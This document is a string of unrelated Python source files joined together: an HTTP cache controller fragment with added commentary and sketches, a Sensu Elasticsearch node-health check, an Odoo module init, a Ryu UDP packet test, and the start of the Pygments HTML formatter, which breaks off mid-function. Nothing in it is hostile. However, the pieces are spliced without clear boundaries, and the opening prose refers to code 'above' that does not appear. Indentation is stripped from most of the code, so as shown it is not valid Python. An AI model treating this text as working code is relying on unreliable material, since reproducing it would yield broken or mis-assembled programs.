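The freshness decision above boils down to: the lifetime comes from the response's `max-age`, the request's `max-age` overrides it, and `min-fresh` inflates the current age. A compressed sketch of that arithmetic (the `Expires`-based lifetime is omitted here):

```python
def is_fresh(current_age, resp_cc, req_cc):
    # Mirrors the ordering in cached_request: response max-age first, then the
    # request's max-age override, then the min-fresh safety margin.
    lifetime = resp_cc.get("max-age", 0)
    if "max-age" in req_cc:
        lifetime = req_cc["max-age"]
    current_age += req_cc.get("min-fresh", 0)
    return lifetime > current_age

print(is_fresh(100, {"max-age": 3600}, {}))                   # True
print(is_fresh(100, {"max-age": 3600}, {"min-fresh": 4000}))  # False
```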
def conditional_headers(self, request):
cache_url = self.cache_url(request.url)
resp = self.serializer.loads(request, self.cache.get(cache_url))
new_headers = {}
if resp:
headers = CaseInsensitiveDict(resp.headers)
if "etag" in headers:
new_headers["If-None-Match"] = headers["ETag"]
if "last-modified" in headers:
new_headers["If-Modified-Since"] = headers["Last-Modified"]
return new_headers
def cache_response(self, request, response, body=None, status_codes=None):
"""
Algorithm for caching requests.
This assumes a requests Response object.
"""
# From httplib2: Don't cache 206's since we aren't going to
# handle byte range requests
cacheable_status_codes = status_codes or self.cacheable_status_codes
if response.status not in cacheable_status_codes:
logger.debug(
"Status code %s not in %s", response.status, cacheable_status_codes
)
return
response_headers = CaseInsensitiveDict(response.headers)
# If we've been given a body, our response has a Content-Length, that
# Content-Length is valid then we can check to see if the body we've
# been given matches the expected size, and if it doesn't we'll just
# skip trying to cache it.
if (
body is not None
and "content-length" in response_headers
and response_headers["content-length"].isdigit()
and int(response_headers["content-length"]) != len(body)
):
return
cc_req = self.parse_cache_control(request.headers)
cc = self.parse_cache_control(response_headers)
cache_url = self.cache_url(request.url)
logger.debug('Updating cache with response from "%s"', cache_url)
# Delete it from the cache if we happen to have it stored there
no_store = False
if "no-store" in cc:
no_store = True
logger.debug('Response header has "no-store"')
if "no-store" in cc_req:
no_store = True
logger.debug('Request header has "no-store"')
if no_store and self.cache.get(cache_url):
logger.debug('Purging existing cache entry to honor "no-store"')
self.cache.delete(cache_url)
if no_store:
return
# https://tools.ietf.org/html/rfc7234#section-4.1:
# A Vary header field-value of "*" always fails to match.
# Storing such a response leads to a deserialization warning
# during cache lookup and is not allowed to ever be served,
# so storing it can be avoided.
if "*" in response_headers.get("vary", ""):
logger.debug('Response header has "Vary: *"')
return
# If we've been given an etag, then keep the response
if self.cache_etags and "etag" in response_headers:
logger.debug("Caching due to etag")
self.cache.set(
cache_url, self.serializer.dumps(request, response, body=body)
)
# Add to the cache any 301s. We do this before looking that
# the Date headers.
elif response.status == 301:
logger.debug("Caching permanant redirect")
self.cache.set(cache_url, self.serializer.dumps(request, response))
# Add to the cache if the response headers demand it. If there
# is no date header then we can't do anything about expiring
# the cache.
elif "date" in response_headers:
# cache when there is a max-age > 0
if "max-age" in cc and cc["max-age"] > 0:
logger.debug("Caching b/c date exists and max-age > 0")
self.cache.set(
cache_url, self.serializer.dumps(request, response, body=body)
)
# If the request can expire, it means we should cache it
# in the meantime.
elif "expires" in response_headers:
if response_headers["expires"]:
logger.debug("Caching b/c of expires header")
self.cache.set(
cache_url, self.serializer.dumps(request, response, body=body)
)
def update_cached_response(self, request, response):
"""On a 304 we will get a new set of headers that we want to
update our cached value with, assuming we have one.
This should only ever be called when we've sent an ETag and
gotten a 304 as the response.
"""
cache_url = self.cache_url(request.url)
cached_response = self.serializer.loads(request, self.cache.get(cache_url))
if not cached_response:
# we didn't have a cached response
return response
        # Let's update our headers with the headers from the new request:
# http://tools.ietf.org/html/draft-ietf-httpbis-p4-conditional-26#section-4.1
#
# The server isn't supposed to send headers that would make
# the cached body invalid. But... just in case, we'll be sure
        # to strip out ones we know that might be problematic due to
# typical assumptions.
excluded_headers = ["content-length"]
cached_response.headers.update(
dict(
(k, v)
for k, v in response.headers.items()
if k.lower() not in excluded_headers
)
)
# we want a 200 b/c we have content via the cache
cached_response.status = 200
# update our cache
self.cache.set(cache_url, self.serializer.dumps(request, cached_response))
return cached_response
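On a 304 the cached body is kept and only the headers are refreshed, minus `Content-Length` (the 304 itself carries no body, so its length header would corrupt the entry). A standalone sketch of the merge, using a plain dict rather than the `CaseInsensitiveDict` the real code relies on:

```python
def merge_304_headers(cached_headers, new_headers, excluded=("content-length",)):
    # Refresh cached headers from a 304 response, skipping excluded ones,
    # mirroring the generator-expression update in update_cached_response.
    merged = dict(cached_headers)
    merged.update(
        (k, v) for k, v in new_headers.items() if k.lower() not in excluded
    )
    return merged

merged = merge_304_headers(
    {"Content-Length": "1024", "ETag": '"v1"'},
    {"Content-Length": "0", "ETag": '"v2"'},
)
print(merged)  # {'Content-Length': '1024', 'ETag': '"v2"'}
```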
|
yieldbot/sensu-yieldbot-plugins | refs/heads/master | plugins/elasticsearch/check-es-tribe-node.py | 1 | #!/usr/bin/env python
"""Sensu check script: Check if tribe nodes are reachable and recent 7 days es doc count are more then threshold.
This script is run by Sensu at regular intervals.
"""
from optparse import OptionParser
import socket
import sys
import httplib
import json
import datetime
import re
CHECK_PASSING = 0
CHECK_WARNING = 1
CHECK_FAILING = 2
myname = socket.gethostname()
nodes = {}
nodes["coldevents"] = ["analytics-coldevents-0",
"analytics-coldevents-1",
"analytics-coldevents-2",
"analytics-coldevents-3",
"analytics-coldevents-4",
"analytics-coldevents-5",
"analytics-coldevents-6",
"analytics-coldevents-7",
"analytics-coldevents-8",
"analytics-coldevents-9",
"analytics-coldevents-10",
"analytics-coldevents-11",
"analytics-coldevents-12",
"analytics-coldevents-13",
"analytics-coldevents-14",
"analytics-coldevents-15",
"analytics-coldevents-16",
"analytics-coldevents-17",
"analytics-coldevents-18",
"analytics-coldevents-19",
"analytics-coldevents-20",
"analytics-tribe-0/coldevents",
"analytics-tribe-1/coldevents",
"analytics-tribe-2/coldevents"]
nodes["hotevents"] = ["analytics-hotevents-0",
"analytics-hotevents-1",
"analytics-hotevents-2",
"analytics-hotevents-3",
"analytics-hotevents-4",
"analytics-hotevents-5",
"analytics-hotevents-6",
"analytics-hotevents-7",
"analytics-hotevents-8",
"analytics-tribe-0/hotevents",
"analytics-tribe-1/hotevents",
"analytics-tribe-2/hotevents"]
nodes["aggregation"] = ["analytics-aggregation-0",
"analytics-aggregation-1",
"analytics-aggregation-2",
"analytics-aggregation-3",
"analytics-aggregation-4",
"analytics-aggregation-5",
"analytics-aggregation-6",
"analytics-aggregation-7",
"analytics-aggregation-8",
"analytics-aggregation-9",
"analytics-aggregation-10",
"analytics-aggregation-11",
"analytics-tribe-0/aggregation",
"analytics-tribe-1/aggregation",
"analytics-tribe-2/aggregation"]
def check_tribe_node(cluster):
conn = httplib.HTTPConnection(cluster)
now = datetime.datetime.utcnow()
output = []
for i in range(1,7):
dt = datetime.datetime(year=now.year, month=now.month, day=now.day) - datetime.timedelta(days=i)
dt_str = dt.strftime("%Y-%m-%d")
index = "adevents-" + dt_str
try:
conn.request("GET", "/%s/_count" % (index))
resp = conn.getresponse()
data = json.loads(resp.read())
if resp.status == 200:
if data['count'] < 1000000:
msg = "ES Doc Count for index= `%s` is `%d`, less then expected count." % (index, data['count'])
output.append(msg)
else:
msg = "Failed in getting ES Doc Count for index= `%s`. Reason: `%s`" % (index, data['error']['reason'])
output.append(msg)
except Exception, e:
print " `check_tribe_node:` host= `%s`, Unable to connect tribe node. got exception: `%s`" % (myname, e)
sys.exit(CHECK_FAILING)
conn.close()
if len(output) > 0:
print " `check_tribe_node:` Error on host= `%s` %s" % (myname, output)
sys.exit(CHECK_WARNING)
def check_nodes(cluster, name):
conn = httplib.HTTPConnection(cluster)
conn.request("GET", "/_cat/nodes?h=n")
resp = conn.getresponse()
data = resp.read()
output = ""
active = re.split("\s+",data)
for i in range(len(nodes[name])):
if nodes[name][i] not in active:
output = output + nodes[name][i] + ","
if output != "":
output = "`" + output + "` node/s for " + name + " cluster are down or not reachable.\n"
return output
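`/_cat/nodes?h=n` returns one node name per line, so the membership test above is just a whitespace split against the expected roster. A standalone sketch of that comparison (the sample response body is made up):

```python
import re

def missing_nodes(cat_output, expected):
    # Same approach as check_nodes: split the _cat/nodes text on whitespace
    # and report expected names that are absent.
    active = re.split(r"\s+", cat_output)
    return [name for name in expected if name not in active]

sample = "node-0\nnode-1\n"  # hypothetical _cat/nodes?h=n response body
print(missing_nodes(sample, ["node-0", "node-1", "node-2"]))  # ['node-2']
```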
if __name__ == '__main__':
cluster = "localhost:9200"
check_tribe_node(cluster)
try:
coldevents = check_nodes("analytics-coldevents.elasticsearch.service.us-east-1.consul:9200","coldevents")
hotevents = check_nodes("analytics-hotevents.elasticsearch.service.us-east-1.consul:9200","hotevents")
aggregation = check_nodes("analytics-aggregation.elasticsearch.service.us-east-1.consul:9200","aggregation")
except Exception, e:
print " `check_tribe_node:` host= `%s`, got exception: `%s`" % (myname, e)
sys.exit(CHECK_FAILING)
if coldevents == "" and hotevents == "" and aggregation == "":
print " `check_tribe_node:` The tribe node is fine and reachable."
sys.exit(CHECK_PASSING)
else:
print " `check_tribe_node:` %s %s %s" % (coldevents, hotevents, aggregation)
sys.exit(CHECK_WARNING)
|
ubiar/odoo | refs/heads/8.0 | addons/product/report/__init__.py | 452 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import product_pricelist
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
StephenKing/summerschool-2015-ryu | refs/heads/summerschool-step2-complete | ryu/tests/unit/packet/test_udp.py | 38 | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import unittest
import logging
import struct
from struct import *
from nose.tools import *
from ryu.ofproto import ether, inet
from ryu.lib.packet.packet import Packet
from ryu.lib.packet.udp import udp
from ryu.lib.packet.ipv4 import ipv4
from ryu.lib.packet import packet_utils
from ryu.lib import addrconv
LOG = logging.getLogger('test_udp')
class Test_udp(unittest.TestCase):
""" Test case for udp
"""
src_port = 6431
dst_port = 8080
total_length = 65507
csum = 12345
u = udp(src_port, dst_port, total_length, csum)
buf = pack(udp._PACK_STR, src_port, dst_port, total_length, csum)
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
eq_(self.src_port, self.u.src_port)
eq_(self.dst_port, self.u.dst_port)
eq_(self.total_length, self.u.total_length)
eq_(self.csum, self.u.csum)
def test_parser(self):
r1, r2, _ = self.u.parser(self.buf)
eq_(self.src_port, r1.src_port)
eq_(self.dst_port, r1.dst_port)
eq_(self.total_length, r1.total_length)
eq_(self.csum, r1.csum)
eq_(None, r2)
def test_serialize(self):
src_port = 6431
dst_port = 8080
total_length = 0
csum = 0
src_ip = '192.168.10.1'
dst_ip = '192.168.100.1'
prev = ipv4(4, 5, 0, 0, 0, 0, 0, 64,
inet.IPPROTO_UDP, 0, src_ip, dst_ip)
u = udp(src_port, dst_port, total_length, csum)
buf = u.serialize(bytearray(), prev)
res = struct.unpack(udp._PACK_STR, buf)
eq_(res[0], src_port)
eq_(res[1], dst_port)
eq_(res[2], struct.calcsize(udp._PACK_STR))
# checksum
ph = struct.pack('!4s4sBBH',
addrconv.ipv4.text_to_bin(src_ip),
addrconv.ipv4.text_to_bin(dst_ip), 0, 17, res[2])
d = ph + buf + bytearray()
s = packet_utils.checksum(d)
eq_(0, s)
@raises(Exception)
def test_malformed_udp(self):
m_short_buf = self.buf[1:udp._MIN_LEN]
udp.parser(m_short_buf)
def test_default_args(self):
prev = ipv4(proto=inet.IPPROTO_UDP)
u = udp()
buf = u.serialize(bytearray(), prev)
res = struct.unpack(udp._PACK_STR, buf)
eq_(res[0], 1)
eq_(res[1], 1)
eq_(res[2], udp._MIN_LEN)
def test_json(self):
jsondict = self.u.to_jsondict()
u = udp.from_jsondict(jsondict['udp'])
eq_(str(self.u), str(u))
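The zero result asserted in `test_serialize` is the defining property of the Internet checksum: summing the pseudo-header, the UDP header, and the checksum itself in ones'-complement arithmetic must yield zero. A simplified standalone stand-in for `packet_utils.checksum` illustrating the property (pseudo-header omitted for brevity):

```python
import struct

def checksum(data):
    # RFC 1071 ones'-complement sum over 16-bit big-endian words.
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

# UDP header with the checksum field zeroed: src 6431, dst 8080, length 8.
header = struct.pack("!HHHH", 6431, 8080, 8, 0)
cs = checksum(header)

# Re-inserting the computed checksum makes the header sum to zero, which is
# the same property test_serialize asserts via packet_utils.checksum.
print(checksum(header[:6] + struct.pack("!H", cs)))  # 0
```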
|
artdent/jgments | refs/heads/master | lib/pygments-1.2.2-patched/pygments/formatters/html.py | 3 | # -*- coding: utf-8 -*-
"""
pygments.formatters.html
~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for HTML output.
:copyright: Copyright 2006-2010 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys, os
import StringIO
try:
set
except NameError:
from sets import Set as set
from pygments.formatter import Formatter
from pygments.token import Token, Text, STANDARD_TYPES
from pygments.util import get_bool_opt, get_int_opt, get_list_opt, bytes
__all__ = ['HtmlFormatter']
def escape_html(text):
"""Escape &, <, > as well as single and double quotes for HTML."""
    return text.replace('&', '&amp;'). \
                replace('<', '&lt;'). \
                replace('>', '&gt;'). \
                replace('"', '&quot;'). \
                replace("'", '&#39;')
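Order matters in this chain: `&` must be escaped first, otherwise the ampersands introduced by the later replacements would themselves get escaped. A standalone check of the intended behavior:

```python
def escape(text):
    # Same chain as escape_html above: '&' first, then brackets and quotes.
    return (text.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace('"', "&quot;")
                .replace("'", "&#39;"))

print(escape('<a href="x">&</a>'))  # &lt;a href=&quot;x&quot;&gt;&amp;&lt;/a&gt;
```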
def get_random_id():
"""Return a random id for javascript fields."""
from random import random
from time import time
try:
from hashlib import sha1 as sha
except ImportError:
import sha
sha = sha.new
return sha('%s|%s' % (random(), time())).hexdigest()
def _get_ttype_class(ttype):
fname = STANDARD_TYPES.get(ttype)
if fname:
return fname
aname = ''
while fname is None:
aname = '-' + ttype[-1] + aname
ttype = ttype.parent
fname = STANDARD_TYPES.get(ttype)
return fname + aname
CSSFILE_TEMPLATE = '''\
td.linenos { background-color: #f0f0f0; padding-right: 10px; }
span.lineno { background-color: #f0f0f0; padding: 0 5px 0 5px; }
pre { line-height: 125%%; }
%(styledefs)s
'''
DOC_HEADER = '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=%(encoding)s">
<style type="text/css">
''' + CSSFILE_TEMPLATE + '''
</style>
</head>
<body>
<h2>%(title)s</h2>
'''
DOC_HEADER_EXTERNALCSS = '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=%(encoding)s">
<link rel="stylesheet" href="%(cssfile)s" type="text/css">
</head>
<body>
<h2>%(title)s</h2>
'''
DOC_FOOTER = '''\
</body>
</html>
'''
class HtmlFormatter(Formatter):
r"""
Format tokens as HTML 4 ``<span>`` tags within a ``<pre>`` tag, wrapped
in a ``<div>`` tag. The ``<div>``'s CSS class can be set by the `cssclass`
option.
If the `linenos` option is set to ``"table"``, the ``<pre>`` is
additionally wrapped inside a ``<table>`` which has one row and two
cells: one containing the line numbers and one containing the code.
Example:
.. sourcecode:: html
<div class="highlight" >
<table><tr>
<td class="linenos" title="click to toggle"
onclick="with (this.firstChild.style)
{ display = (display == '') ? 'none' : '' }">
<pre>1
2</pre>
</td>
<td class="code">
<pre><span class="Ke">def </span><span class="NaFu">foo</span>(bar):
<span class="Ke">pass</span>
</pre>
</td>
</tr></table></div>
(whitespace added to improve clarity).
Wrapping can be disabled using the `nowrap` option.
A list of lines can be specified using the `hl_lines` option to make these
lines highlighted (as of Pygments 0.11).
With the `full` option, a complete HTML 4 document is output, including
the style definitions inside a ``<style>`` tag, or in a separate file if
the `cssfile` option is given.
The `get_style_defs(arg='')` method of a `HtmlFormatter` returns a string
containing CSS rules for the CSS classes used by the formatter. The
argument `arg` can be used to specify additional CSS selectors that
are prepended to the classes. A call `fmter.get_style_defs('td .code')`
would result in the following CSS classes:
.. sourcecode:: css
td .code .kw { font-weight: bold; color: #00FF00 }
td .code .cm { color: #999999 }
...
If you have Pygments 0.6 or higher, you can also pass a list or tuple to the
`get_style_defs()` method to request multiple prefixes for the tokens:
.. sourcecode:: python
formatter.get_style_defs(['div.syntax pre', 'pre.syntax'])
The output would then look like this:
.. sourcecode:: css
div.syntax pre .kw,
pre.syntax .kw { font-weight: bold; color: #00FF00 }
div.syntax pre .cm,
pre.syntax .cm { color: #999999 }
...
Additional options accepted:
`nowrap`
If set to ``True``, don't wrap the tokens at all, not even inside a ``<pre>``
tag. This disables most other options (default: ``False``).
`full`
Tells the formatter to output a "full" document, i.e. a complete
self-contained document (default: ``False``).
`title`
If `full` is true, the title that should be used to caption the
document (default: ``''``).
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``). This option has no effect if the `cssfile`
and `noclobber_cssfile` option are given and the file specified in
`cssfile` exists.
`noclasses`
If set to true, token ``<span>`` tags will not use CSS classes, but
inline styles. This is not recommended for larger pieces of code since
it increases output size by quite a bit (default: ``False``).
`classprefix`
Since the token types use relatively short class names, they may clash
with some of your own class names. In this case you can use the
`classprefix` option to give a string to prepend to all Pygments-generated
CSS class names for token types.
Note that this option also affects the output of `get_style_defs()`.
`cssclass`
CSS class for the wrapping ``<div>`` tag (default: ``'highlight'``).
If you set this option, the default selector for `get_style_defs()`
will be this class.
*New in Pygments 0.9:* If you select the ``'table'`` line numbers, the
wrapping table will have a CSS class of this string plus ``'table'``,
the default is accordingly ``'highlighttable'``.
`cssstyles`
Inline CSS styles for the wrapping ``<div>`` tag (default: ``''``).
`prestyles`
Inline CSS styles for the ``<pre>`` tag (default: ``''``). *New in
Pygments 0.11.*
`cssfile`
If the `full` option is true and this option is given, it must be the
name of an external file. If the filename does not include an absolute
path, the file's path will be assumed to be relative to the main output
file's path, if the latter can be found. The stylesheet is then written
to this file instead of the HTML file. *New in Pygments 0.6.*
`noclobber_cssfile`
If `cssfile` is given and the specified file exists, the css file will
not be overwritten. This allows the use of the `full` option in
combination with a user specified css file. Default is ``False``.
*New in Pygments 1.1.*
`linenos`
If set to ``'table'``, output line numbers as a table with two cells,
one containing the line numbers, the other the whole code. This is
copy-and-paste-friendly, but may cause alignment problems with some
browsers or fonts. If set to ``'inline'``, the line numbers will be
integrated in the ``<pre>`` tag that contains the code (that setting
is *new in Pygments 0.8*).
For compatibility with Pygments 0.7 and earlier, every true value
except ``'inline'`` means the same as ``'table'`` (in particular, that
means also ``True``).
The default value is ``False``, which means no line numbers at all.
**Note:** with the default ("table") line number mechanism, the line
numbers and code can have different line heights in Internet Explorer
unless you give the enclosing ``<pre>`` tags an explicit ``line-height``
CSS property (you get the default line spacing with ``line-height:
125%``).
`hl_lines`
Specify a list of lines to be highlighted. *New in Pygments 0.11.*
`linenostart`
The line number for the first line (default: ``1``).
`linenostep`
If set to a number n > 1, only every nth line number is printed.
`linenospecial`
If set to a number n > 0, every nth line number is given the CSS
class ``"special"`` (default: ``0``).
`nobackground`
If set to ``True``, the formatter won't output the background color
for the wrapping element (this automatically defaults to ``False``
when there is no wrapping element [eg: no argument for the
`get_syntax_defs` method given]) (default: ``False``). *New in
Pygments 0.6.*
`lineseparator`
This string is output between lines of code. It defaults to ``"\n"``,
which is enough to break a line inside ``<pre>`` tags, but you can
e.g. set it to ``"<br>"`` to get HTML line breaks. *New in Pygments
0.7.*
`lineanchors`
If set to a nonempty string, e.g. ``foo``, the formatter will wrap each
output line in an anchor tag with a ``name`` of ``foo-linenumber``.
This allows easy linking to certain lines. *New in Pygments 0.9.*
`anchorlinenos`
If set to `True`, will wrap line numbers in <a> tags. Used in
combination with `linenos` and `lineanchors`.
**Subclassing the HTML formatter**
*New in Pygments 0.7.*
The HTML formatter is now built in a way that allows easy subclassing, thus
customizing the output HTML code. The `format()` method calls
`self._format_lines()` which returns a generator that yields tuples of ``(1,
line)``, where the ``1`` indicates that the ``line`` is a line of the
formatted source code.
    If the `nowrap` option is set, the generator is simply iterated over and the
resulting HTML is output.
Otherwise, `format()` calls `self.wrap()`, which wraps the generator with
other generators. These may add some HTML code to the one generated by
`_format_lines()`, either by modifying the lines generated by the latter,
then yielding them again with ``(1, line)``, and/or by yielding other HTML
code before or after the lines, with ``(0, html)``. The distinction between
source lines and other code makes it possible to wrap the generator multiple
times.
The default `wrap()` implementation adds a ``<div>`` and a ``<pre>`` tag.
A custom `HtmlFormatter` subclass could look like this:
.. sourcecode:: python
class CodeHtmlFormatter(HtmlFormatter):
def wrap(self, source, outfile):
return self._wrap_code(source)
def _wrap_code(self, source):
yield 0, '<code>'
for i, t in source:
if i == 1:
# it's a line of formatted code
t += '<br>'
yield i, t
yield 0, '</code>'
This results in wrapping the formatted lines with a ``<code>`` tag, where the
source lines are broken using ``<br>`` tags.
After calling `wrap()`, the `format()` method also adds the "line numbers"
and/or "full document" wrappers if the respective options are set. Then, all
HTML yielded by the wrapped generator is output.
"""
name = 'HTML'
aliases = ['html']
filenames = ['*.html', '*.htm']
def __init__(self, **options):
Formatter.__init__(self, **options)
self.title = self._decodeifneeded(self.title)
self.nowrap = get_bool_opt(options, 'nowrap', False)
self.noclasses = get_bool_opt(options, 'noclasses', False)
self.classprefix = options.get('classprefix', '')
self.cssclass = self._decodeifneeded(options.get('cssclass', 'highlight'))
self.cssstyles = self._decodeifneeded(options.get('cssstyles', ''))
self.prestyles = self._decodeifneeded(options.get('prestyles', ''))
self.cssfile = self._decodeifneeded(options.get('cssfile', ''))
self.noclobber_cssfile = get_bool_opt(options, 'noclobber_cssfile', False)
linenos = options.get('linenos', False)
if linenos == 'inline':
self.linenos = 2
elif linenos:
# compatibility with <= 0.7
self.linenos = 1
else:
self.linenos = 0
self.linenostart = abs(get_int_opt(options, 'linenostart', 1))
self.linenostep = abs(get_int_opt(options, 'linenostep', 1))
self.linenospecial = abs(get_int_opt(options, 'linenospecial', 0))
self.nobackground = get_bool_opt(options, 'nobackground', False)
self.lineseparator = options.get('lineseparator', '\n')
self.lineanchors = options.get('lineanchors', '')
self.anchorlinenos = options.get('anchorlinenos', False)
self.hl_lines = set()
for lineno in get_list_opt(options, 'hl_lines', []):
try:
self.hl_lines.add(int(lineno))
except ValueError:
pass
self._class_cache = {}
self._create_stylesheet()
def _get_css_class(self, ttype):
"""Return the css class of this token type prefixed with
the classprefix option."""
if ttype in self._class_cache:
return self._class_cache[ttype]
return self.classprefix + _get_ttype_class(ttype)
def _create_stylesheet(self):
t2c = self.ttype2class = {Token: ''}
c2s = self.class2style = {}
cp = self.classprefix
for ttype, ndef in self.style:
name = cp + _get_ttype_class(ttype)
style = ''
if ndef['color']:
style += 'color: #%s; ' % ndef['color']
if ndef['bold']:
style += 'font-weight: bold; '
if ndef['italic']:
style += 'font-style: italic; '
if ndef['underline']:
style += 'text-decoration: underline; '
if ndef['bgcolor']:
style += 'background-color: #%s; ' % ndef['bgcolor']
if ndef['border']:
style += 'border: 1px solid #%s; ' % ndef['border']
if style:
t2c[ttype] = name
# save len(ttype) to enable ordering the styles by
# hierarchy (necessary for CSS cascading rules!)
c2s[name] = (style[:-2], ttype, len(ttype))
def get_style_defs(self, arg=None):
"""
Return CSS style definitions for the classes produced by the current
highlighting style. ``arg`` can be a string or list of selectors to
insert before the token type classes.
"""
if arg is None:
arg = ('cssclass' in self.options and '.'+self.cssclass or '')
if isinstance(arg, basestring):
args = [arg]
else:
args = list(arg)
def prefix(cls):
if cls:
cls = '.' + cls
tmp = []
for arg in args:
tmp.append((arg and arg + ' ' or '') + cls)
return ', '.join(tmp)
styles = [(level, ttype, cls, style)
for cls, (style, ttype, level) in self.class2style.iteritems()
if cls and style]
styles.sort()
lines = ['%s { %s } /* %s */' % (prefix(cls), style, repr(ttype)[6:])
for (level, ttype, cls, style) in styles]
if arg and not self.nobackground and \
self.style.background_color is not None:
text_style = ''
if Text in self.ttype2class:
text_style = ' ' + self.class2style[self.ttype2class[Text]][0]
lines.insert(0, '%s { background: %s;%s }' %
(prefix(''), self.style.background_color, text_style))
if self.style.highlight_color is not None:
lines.insert(0, '%s.hll { background-color: %s }' %
(prefix(''), self.style.highlight_color))
return '\n'.join(lines)
def _decodeifneeded(self, value):
if isinstance(value, bytes):
if self.encoding:
return value.decode(self.encoding)
return value.decode()
return value
def _wrap_full(self, inner, outfile):
if self.cssfile:
if os.path.isabs(self.cssfile):
# it's an absolute filename
cssfilename = self.cssfile
else:
try:
filename = outfile.name
if not filename or filename[0] == '<':
# pseudo files, e.g. name == '<fdopen>'
raise AttributeError
cssfilename = os.path.join(os.path.dirname(filename),
self.cssfile)
except AttributeError:
print >>sys.stderr, 'Note: Cannot determine output file name, ' \
'using current directory as base for the CSS file name'
cssfilename = self.cssfile
# write CSS file only if noclobber_cssfile isn't given as an option.
try:
if not os.path.exists(cssfilename) or not self.noclobber_cssfile:
cf = open(cssfilename, "w")
cf.write(CSSFILE_TEMPLATE %
{'styledefs': self.get_style_defs('body')})
cf.close()
except IOError, err:
err.strerror = 'Error writing CSS file: ' + err.strerror
raise
yield 0, (DOC_HEADER_EXTERNALCSS %
dict(title = self.title,
cssfile = self.cssfile,
encoding = self.encoding))
else:
yield 0, (DOC_HEADER %
dict(title = self.title,
styledefs = self.get_style_defs('body'),
encoding = self.encoding))
for t, line in inner:
yield t, line
yield 0, DOC_FOOTER
def _wrap_tablelinenos(self, inner):
dummyoutfile = StringIO.StringIO()
lncount = 0
for t, line in inner:
if t:
lncount += 1
dummyoutfile.write(line)
fl = self.linenostart
mw = len(str(lncount + fl - 1))
sp = self.linenospecial
st = self.linenostep
la = self.lineanchors
aln = self.anchorlinenos
if sp:
lines = []
for i in range(fl, fl+lncount):
if i % st == 0:
if i % sp == 0:
if aln:
lines.append('<a href="#%s-%d" class="special">%*d</a>' %
(la, i, mw, i))
else:
lines.append('<span class="special">%*d</span>' % (mw, i))
else:
if aln:
lines.append('<a href="#%s-%d">%*d</a>' % (la, i, mw, i))
else:
lines.append('%*d' % (mw, i))
else:
lines.append('')
ls = '\n'.join(lines)
else:
lines = []
for i in range(fl, fl+lncount):
if i % st == 0:
if aln:
lines.append('<a href="#%s-%d">%*d</a>' % (la, i, mw, i))
else:
lines.append('%*d' % (mw, i))
else:
lines.append('')
ls = '\n'.join(lines)
# in case you wonder about the seemingly redundant <div> here: since the
# content in the other cell also is wrapped in a div, some browsers in
# some configurations seem to mess up the formatting...
yield 0, ('<table class="%stable">' % self.cssclass +
'<tr><td class="linenos"><div class="linenodiv"><pre>' +
ls + '</pre></div></td><td class="code">')
yield 0, dummyoutfile.getvalue()
yield 0, '</td></tr></table>'
def _wrap_inlinelinenos(self, inner):
# need a list of lines since we need the width of a single number :(
lines = list(inner)
sp = self.linenospecial
st = self.linenostep
num = self.linenostart
mw = len(str(len(lines) + num - 1))
if sp:
for t, line in lines:
yield 1, '<span class="lineno%s">%*s</span> ' % (
num%sp == 0 and ' special' or '', mw,
(num%st and ' ' or num)) + line
num += 1
else:
for t, line in lines:
yield 1, '<span class="lineno">%*s</span> ' % (
mw, (num%st and ' ' or num)) + line
num += 1
def _wrap_lineanchors(self, inner):
s = self.lineanchors
i = 0
for t, line in inner:
if t:
i += 1
yield 1, '<a name="%s-%d"></a>' % (s, i) + line
else:
yield 0, line
def _wrap_div(self, inner):
style = []
if (self.noclasses and not self.nobackground and
self.style.background_color is not None):
style.append('background: %s' % (self.style.background_color,))
if self.cssstyles:
style.append(self.cssstyles)
style = '; '.join(style)
yield 0, ('<div' + (self.cssclass and ' class="%s"' % self.cssclass)
+ (style and (' style="%s"' % style)) + '>')
for tup in inner:
yield tup
yield 0, '</div>\n'
def _wrap_pre(self, inner):
style = []
if self.prestyles:
style.append(self.prestyles)
if self.noclasses:
style.append('line-height: 125%')
style = '; '.join(style)
yield 0, ('<pre' + (style and ' style="%s"' % style) + '>')
for tup in inner:
yield tup
yield 0, '</pre>'
def _format_lines(self, tokensource):
"""
Just format the tokens, without any wrapping tags.
Yield individual lines.
"""
nocls = self.noclasses
lsep = self.lineseparator
# for <span style=""> lookup only
getcls = self.ttype2class.get
c2s = self.class2style
lspan = ''
line = ''
for ttype, value in tokensource:
if nocls:
cclass = getcls(ttype)
while cclass is None:
ttype = ttype.parent
cclass = getcls(ttype)
cspan = cclass and '<span style="%s">' % c2s[cclass][0] or ''
else:
